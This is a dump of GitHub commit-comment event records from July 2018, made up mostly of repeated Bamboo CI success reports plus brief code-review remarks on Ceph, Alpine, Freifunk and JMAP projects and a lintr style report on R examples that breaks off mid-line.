{"id":"7939357430","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29645987,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-09T18:32:16Z","updated_at":"2018-07-09T18:32:16Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T18:32:16Z"}
{"id":"7939358673","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29645990,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-09T18:32:31Z","updated_at":"2018-07-09T18:32:31Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T18:32:31Z"}
{"id":"7939361569","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29645992,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-09T18:33:04Z","updated_at":"2018-07-09T18:33:04Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T18:33:04Z"}
{"id":"7939363040","type":"CommitCommentEvent","actor":{"login":"lpdmagee"},"repo":{"name":"RBVI/CyPlot"},"payload":{"comment":{"id":29645995,"position":null,"line":null,"path":null,"commit_id":"bc1cd9df8b087f9738882d9c967fd883c162a639","created_at":"2018-07-09T18:33:21Z","updated_at":"2018-07-09T18:33:21Z","author_association":"COLLABORATOR","body":"Note that the tunable options are just blank placeholders. They don't presently do anything."}},"created_at":"2018-07-09T18:33:21Z"}
{"id":"7939363284","type":"CommitCommentEvent","actor":{"login":"blaggacao"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":29645998,"position":null,"line":null,"path":null,"commit_id":"02b38ef8a4abb0abc41a202a359c6d0aa2a925e7","created_at":"2018-07-09T18:33:23Z","updated_at":"2018-07-09T18:33:23Z","author_association":"CONTRIBUTOR","body":"@rnalrd Why? I was planning to use this on a RPi printing server build around [qz.io](https://qz.io/)..."}},"created_at":"2018-07-09T18:33:23Z"}
{"id":"7939363401","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29645999,"position":null,"line":null,"path":null,"commit_id":"aa2b41023cab83e14ad9f61b13d09bde57e2cea4","created_at":"2018-07-09T18:33:25Z","updated_at":"2018-07-09T18:33:25Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T18:33:25Z"}
{"id":"7939364906","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29646002,"position":null,"line":null,"path":null,"commit_id":"c6d06d8d0f59b201a6f7c792af17763a724a9816","created_at":"2018-07-09T18:33:43Z","updated_at":"2018-07-09T18:33:43Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T18:33:43Z"}
{"id":"7939365395","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29646004,"position":null,"line":null,"path":null,"commit_id":"ddd2c913a3df0b153c89c681d4ed9eab38e134f9","created_at":"2018-07-09T18:33:48Z","updated_at":"2018-07-09T18:33:48Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-09T18:33:48Z"}
{"id":"7939366979","type":"CommitCommentEvent","actor":{"login":"jdurgin"},"repo":{"name":"ceph/ceph-ci"},"payload":{"comment":{"id":29646012,"position":32,"line":1641,"path":"src/osd/PrimaryLogPG.cc","commit_id":"b68920d6b31d21942b97da55d996a854c31f72b5","created_at":"2018-07-09T18:34:08Z","updated_at":"2018-07-09T18:34:08Z","author_association":"MEMBER","body":"usually I'd be in favor of using the stl functions, but in this case I'd be worried about a bug (e.g. in upcoming pg merging) making us advance past the end of the list.\r\n\r\nUnfortunately we're stuck with O(n) list.size() on el7 (https://github.com/ceph/ceph/pull/18755#issuecomment-353958140) so it seems we need the manual loop here to make sure num_to_trim is not beyond the end of the log"}},"created_at":"2018-07-09T18:34:08Z"}
{"id":"7939367426","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29646015,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-09T18:34:13Z","updated_at":"2018-07-09T18:34:13Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T18:34:13Z"}
{"id":"7939367831","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29646016,"position":null,"line":null,"path":null,"commit_id":"effbf0cb0bd289925da79124c5b8e778a92736bc","created_at":"2018-07-09T18:34:17Z","updated_at":"2018-07-09T18:34:17Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-09T18:34:17Z"}
{"id":"7939369321","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29646019,"position":null,"line":null,"path":null,"commit_id":"46f14abc96336851feee32a7fc631c00ae8ef2ff","created_at":"2018-07-09T18:34:34Z","updated_at":"2018-07-09T18:34:34Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T18:34:34Z"}
{"id":"7939371155","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29646021,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-09T18:34:55Z","updated_at":"2018-07-09T18:34:55Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T18:34:55Z"}
{"id":"7939373472","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29646030,"position":null,"line":null,"path":null,"commit_id":"ddd2c913a3df0b153c89c681d4ed9eab38e134f9","created_at":"2018-07-09T18:35:22Z","updated_at":"2018-07-09T18:35:22Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T18:35:22Z"}
{"id":"7939373786","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29646031,"position":null,"line":null,"path":null,"commit_id":"93a0183c3b07e184676c2c1539fba6a83e9271d5","created_at":"2018-07-09T18:35:26Z","updated_at":"2018-07-09T18:35:26Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-09T18:35:26Z"}
{"id":"7939375140","type":"CommitCommentEvent","actor":{"login":"jdurgin"},"repo":{"name":"ceph/ceph-ci"},"payload":{"comment":{"id":29646037,"position":4,"line":1643,"path":"src/osd/PrimaryLogPG.cc","commit_id":"313a947c0040757a1974825c67bda798d091b66c","created_at":"2018-07-09T18:35:42Z","updated_at":"2018-07-09T18:35:42Z","author_association":"MEMBER","body":"seems like this might be hiding a bug going past the head of the log with std::advance"}},"created_at":"2018-07-09T18:35:42Z"}
{"id":"7939375460","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29646039,"position":null,"line":null,"path":null,"commit_id":"9ff879811f4c95e4ebf9b965c64288f1d8c62639","created_at":"2018-07-09T18:35:45Z","updated_at":"2018-07-09T18:35:45Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T18:35:45Z"}
{"id":"7939377298","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29646046,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-09T18:36:06Z","updated_at":"2018-07-09T18:36:06Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T18:36:06Z"}
{"id":"7939379411","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29646051,"position":null,"line":null,"path":null,"commit_id":"93a0183c3b07e184676c2c1539fba6a83e9271d5","created_at":"2018-07-09T18:36:32Z","updated_at":"2018-07-09T18:36:32Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T18:36:32Z"}
{"id":"7939381343","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29646057,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-09T18:36:55Z","updated_at":"2018-07-09T18:36:55Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T18:36:55Z"}
{"id":"7939382000","type":"CommitCommentEvent","actor":{"login":"pmelange"},"repo":{"name":"freifunk-berlin/firmware-packages"},"payload":{"comment":{"id":29646060,"position":4,"line":27,"path":"defaults/freifunk-berlin-olsrd-defaults/uci-defaults/freifunk-berlin-olsrd-defaults","commit_id":"f49fadfda0f19283b081be92acb2bbcf785bf2bb","created_at":"2018-07-09T18:37:03Z","updated_at":"2018-07-09T18:37:03Z","author_association":"NONE","body":"On a router based off of master, the pid file is dnsmasq.cfg01411c.pid.  There has to be a better way of getting the name of the correct pid file into the generated /tmp/etc/olsrd*.conf files"}},"created_at":"2018-07-09T18:37:03Z"}
{"id":"7939382609","type":"CommitCommentEvent","actor":{"login":"rjbs"},"repo":{"name":"wolfsage/JMAP-TestSuite"},"payload":{"comment":{"id":29646062,"position":30,"line":64,"path":"lib/JMAP/TestSuite/JMAP/Tester/Wrapper.pm","commit_id":"0fa13441769b0dbcd13c444c1905f301896b6330","created_at":"2018-07-09T18:37:11Z","updated_at":"2018-07-09T18:37:11Z","author_association":"NONE","body":"In the above, we issue a single-sentence request and expect a single sentence in response, with the given hashref used to compare to the result args and the sent-sentence name used to check the received."}},"created_at":"2018-07-09T18:37:11Z"}
{"id":"7939383221","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29646066,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-09T18:37:19Z","updated_at":"2018-07-09T18:37:19Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T18:37:19Z"}
{"id":"7939385038","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29646071,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-09T18:37:41Z","updated_at":"2018-07-09T18:37:41Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T18:37:41Z"}
{"id":"7939387008","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"PredictiveEcology/SpaDES.core"},"payload":{"comment":{"id":29646076,"position":null,"line":null,"path":null,"commit_id":"38c1b41869d0a28b43927694582bf539385a33cc","created_at":"2018-07-09T18:38:05Z","updated_at":"2018-07-09T18:38:05Z","author_association":"NONE","body":"[inst/examples/example_experiment.R:91:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/inst/examples/example_experiment.R#L91) *style:* **Commented code should be removed.**\n```r\n​  # library(raster)\n    ^~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:92:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/inst/examples/example_experiment.R#L92) *style:* **Commented code should be removed.**\n```r\n​  # beginCluster(20) # if you have multiple clusters available, use them here to save time\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:96:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/inst/examples/example_experiment.R#L96) *style:* **Commented code should be removed.**\n```r\n​  # endCluster() # end the clusters\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:152:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/inst/examples/example_experiment.R#L152) *style:* **Commented code should be removed.**\n```r\n​  # fires <- lapply(sims, function(x) x$landscape$fires) %>% stack\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:49:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/inst/examples/example_POM.R#L49) *style:* **Commented code should be removed.**\n```r\n​  # cl <- makeCluster(detectCores() - 1) # not implemented yet in DEoptim\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:84:4:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/inst/examples/example_POM.R#L84) *style:* **Commented code should be removed.**\n```r\n​  #stopCluster(cl) # not yet implemented, waiting for DEoptim\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:107:34:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/inst/examples/example_POM.R#L107) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    params(sim1)$caribouMovement$N <- pars[2]\n                                 ^\n```\n[inst/examples/example_POM.R:114:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/inst/examples/example_POM.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    nPattern_Out <- caribouFn(out$caribou)\n    ^~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:120:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/inst/examples/example_POM.R#L120) *style:* **Commented code should be removed.**\n```r\n​    # cat(minimizeFn)\n      ^~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:121:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/inst/examples/example_POM.R#L121) *style:* **Commented code should be removed.**\n```r\n​    # cat(\" \")\n      ^~~~~~~~\n```\n[inst/examples/example_POM.R:122:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/inst/examples/example_POM.R#L122) *style:* **Commented code should be removed.**\n```r\n​    # cat(pars)\n      ^~~~~~~~~\n```\n[inst/examples/example_POM.R:123:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/inst/examples/example_POM.R#L123) *style:* **Commented code should be removed.**\n```r\n​    # cat(\"\\n\")\n      ^~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/inst/sampleModules/caribouMovement/caribouMovement.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:54:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/inst/sampleModules/caribouMovement/caribouMovement.R#L54) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.caribouMovement <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/inst/sampleModules/caribouMovement/caribouMovement.R#L86) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.plotInterval, \"caribouMovement\", 